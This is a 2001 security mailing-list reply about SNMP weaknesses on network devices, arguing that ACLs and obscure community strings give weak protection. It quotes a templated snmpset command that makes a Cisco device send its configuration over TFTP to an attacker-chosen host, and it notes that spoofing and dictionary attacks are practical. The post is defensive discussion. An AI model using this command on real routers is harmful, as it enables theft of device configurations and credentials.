RE: snmp vulnerablities

["woody weaver" <woody.weaver () callisma com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Monday, July 16, 2001 3:01 PM, Ron Russell wrote:
[...]
> And the activity could have been prevented by proper use of 
> ACLs,

This is not an easy task.  Because UDP is stateless, spoofing is
fairly trivial.  Particularly for the snmp set approach you mention
- -- the format is 
$SNMPSET $TARGET $COMMUNITY .1.3.6.1.4.1.9.2.1.55.$MYIP s $CONFIG

where $MYIP is the IP address of the tftp server.  Consequently, one
can spoof the snmp set as coming from that trusted host -- the ACL
has to reach into the data portion of the packet to prevent the tftp
occurring.  Its not clear to me where the original penetration test
was coming from, but if it was from a portion of the network where
detecting spoofed addresses is not easy, then you have few options.

> and the
> proper configuration of SNMP (not using easily guessable 
> strings).

I'm not sure this is especially helpful; SNMP is sent in the clear,
of course, so the strings can be observed in transit, the game is up.
 Also, dictionary attacks are straightforward, since logging of snmp
traffic seems to be rarely done.

[...]

- --woody

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO1N9xaWr4+fi694gEQL8gwCgg5Q7huPhA+yCUuwFjAkTHcxJ/fAAoKVb
RweCZ7evjZ29a+RgvtPB2m1r
=cqIf
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/